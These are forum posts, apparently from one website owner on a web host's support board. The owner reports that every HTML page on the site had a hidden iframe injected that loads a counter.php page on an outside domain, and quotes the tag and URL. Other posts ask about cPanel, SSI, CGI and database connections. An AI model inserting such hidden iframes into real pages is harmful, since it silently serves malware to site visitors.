pison

Someone, somehow, edited every single one of my .htm, .html, or .shtml pages to append the following link to the bottom of the file: &--#60;iframe src="" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/&--#62; between the two qoutes for 'src' is this: "http: // www.lwg-eichstaedt.de / counter.php" (remove the spaces ... I added them to deactivate the link here so as to not spread the malware). I did NOT do this to my pages. They were all done (presumably by script) at 9:30am on 17 May 2013. Questions: How did this happen? I would expect better security on the server. Is there anyone who can grep to do a global "find and replace" on my entire site? I've started downloading the site, but FTP chokes on me and dies midway through. I don't have the patience to figure out where it died and start from there ... over and over again. Related question: I can't get into my CPanel. I get the normal login screen, but then get "Thank You for installing cPanel / WHM." This server is currently not licensed. Please contact the server administrator. Other services available on this server such as web services are likely functioning normally. (License has a future date) Once the license on this server is active, you will no longer see this message. If you have installed a license since loading this page, click here to reload. here's the URL where I get that message: http://stevie.heliohost.org:2082/frontend/x3/index.phpcp . Is this related to being cracked/hacked?

I get a screen that says "Thank You for installing cPanel / WHM" This server is currently not licensed. Please contact the server administrator. Other services available on this server such as web services are likely functioning normally. (License has a future date) Once the license on this server is active, you will no longer see this message. If you have installed a license since loading this page, click here to reload. License?????? Does this have anything to do with my site being cracked? Please help.

Someone managed to edit all my .htm, .html, and .shtml pages. They appended the following to all of my files ..... iframe src="" style="visibility: hidden; position: absolute; left: 0px; top: 0px" width="10" height="10"/ (with beginning and ending < and >), and this for the src: http://www.lwg-eichstaedt.de/counter.php (I separated it so that it won't be an active link here - I don't want to infect the boards <sigh>) 2 questions: How did they do this? Every file was edited (presumably by script) at 9:30 a.m. on 17 May 2013. How did they get in? How do I prevent it in the future? I actually would expect the server to have better security than this. Please advise .....

I've received an email from a visitor, saying that his anti-virus software is stopping him from seeing my site, because it says there's a malicious trojan. If there is, how do I find/'remove it, and then prevent it for the future? Please help.

I'm guessing it's server-wide, because *all* my scripts are returning this error, when they were just working. I've been getting this error message now for about 3.5 hours. What's up?

I did it another way. I created a .txt file in the public_html directory, have my transcription script update/rewrite the file each time new records get transcribed, and then just inhale the .txt file with the usual <!--#include virtual="./will_counts.txt" --> thingamajig. Thanks for all the suggestions! I didn't see them until after I'd done my work-around.

I have a cgi script in my public_html/cgi-bin folder, and it's chmod'd 755. It is called from a .shtml page in the public_html directory with the following: <!--#exec cgi="./cgi-bin/will_counts.cgi" --> The script is just to add some up-to-the-minute statistics to the static page. Obviously, it's not working, or I wouldn't be posting here. Any suggestions on why it isn't working, or what I can do to fix it? TSM, Pam

I've tried this: $dbh = DBI->connect("DBI:mysql:kymercer_obits:[dbserver]", [user], undef, undef); I've put various things in for dbserver and user, but keep getting messages like this: Access denied for user 'kymercer'@'localhost' (using password: NO) In the above example, I'd put 'kymercer' in for user, and 'localhost' as the server. What should I put here to get it to connect? Any help appreciated.

Success! Thank you soooooooo much.

Thanks so much for answering. My .htaccess file was in the /public_html folder. I edited the lines you suggested into the end of the file and saved it, but it doesn't seem to have made a difference. I'm still tinkering :-) Thanks again. More suggestions welcome.

I have a menu file that I use SSI for, to include in the top of each of my page. Here's the code I'm used to using ... please critique and correct so it works here on heliohost ..... <!--#include virtual="/~kymercer/menu.txt"--> (this is what I used on my previous host, and it worked) I've changed the filename to menu.shtml, but don't know what to put in place of /~kymercer/ in order to get it to work. To see a page that should/would/could have this, go to http://kymercer.heli...rg/census/1860/ and do a 'View Source' to see how I have it now. It's obviously not right, and I can't find anything here to instruct me how to do it. Any help appreciated!